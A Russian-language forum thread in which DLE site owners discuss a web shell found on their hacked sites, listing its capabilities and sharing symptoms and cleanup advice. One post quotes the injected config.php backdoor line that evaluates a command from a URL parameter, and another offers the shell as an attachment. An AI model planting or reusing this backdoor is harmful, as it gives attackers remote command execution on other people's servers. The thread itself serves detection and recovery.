Информация Массовый взлом сайтов на DLE

[Christmasnet]

DLE 8.5 Nulled-Mid-team

Есть такая группа или хацкер Web Shell by oRb.
Недавно обнаружил у себя на сайте шелл, залитый в папку uploads/fotos. Решил обновиться до DLE 9.0, после установки проверил антивирусом и нашел эту гадость.

Вот что может этот шелл.

Описание:

Авторизация
Инфа о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Обход Safe mode
Работа со строками + поиск хеша в онлайн базах
Брутфорс (FTP, MySql, PostgreSQL)
Биндпорты и бек-коннекты на C и Perl
Самоудаление
Поиск текста в файлах
Под UNIX/WIN

Из фишек

Антигугл (чекается юзерагент, если гугл, тогда 404)
Консолька запоминает введенные комманды. (перемещатся по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (23.53 KB)
Удобен в инклюдах
Выбор кодировки, в которой работает шелл.

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Смотрите свои сайты, обновляйте.

 

[absolutNICK]

У меня такая же самая беда.
Вот что ещё надо проверить:
файл dbconfig.php и config.php в папке /engine/data/
В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код:

'lang_123' => "{${@eval($_GET[cmd])}}",

Скорей всего что используется недавно обнаруженная уязвимость на недостаточную обработку данных. Об этом можно прочитать и на офф. сайте DLE и здесь у нас на форуме тоже Для просмотра ссылки Войди или Зарегистрируйся.
Очень удобно, имея на руках базу DLEшных сайтов для постинга новостей, пройтись по ней с целью использования уязвимости. Есть кстати версия, что это разработчики DLE решили использовать уязвимость для поднятия уровня продаж своего софта.

 

[index111]

утром обнаружил на одном варезнике второго админа и ник такой же, вот засранцы спасибо что про шелл написали, а то бы не заметил...
Год наверна не заходил на сайт, как сат. держу, и тут такое, обновился сразу. Не понял только зачем им, вроде ничего не тронули.

 

[absolutNICK]

А ты смотрел файл dbconfig.php - там может быть жава с партнёркой плятящей за просмотры.

 

[index111]

А ты смотрел файл dbconfig.php - там может быть жава с партнёркой плятящей за просмотры.

Спасибо за инфу выше, проверял пусто

 

[Christmasnet]

У меня после этого шелла начались проблемы с базой, делаю оптимизацию и все база не пашет, помечается три таблицы как сбойные. куда копать не вкурю...

 

[absolutNICK]

Кстати, если хотите быстро проверить взломан ли ваш дле-шный сайт, проверьте rss. Если rss выдаёт ошибку - то 95% что у вас стоит тот самый шел.

 

[Gadukin]

у меня не хочет востанавливаться из резервной копии

 

[BKK]

как бы название топика не соответствует тексту в посте
причем тут массовый взлом сайтов, и шелл на конкретном сайте?

 

[antiterror]

Вот нашёл тоже у себя shell этот, токо не смогли они взломать мой сайт, зашита стоит)! если кому нужен смотрим аттачмент))

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Для тех у кого был shell залит!
Удалите все файлы и исключительно все файлы если же оставляете проверьте всё на наличии каких либо shell файлов!
Смените все пароли админов или редакторов или модеров! Создайте backup базы, а так же создайте новую базу с новым паролем! После чего залейте все файлы заново на сервер и загрузите backup базы в новую базу! Только это поможет!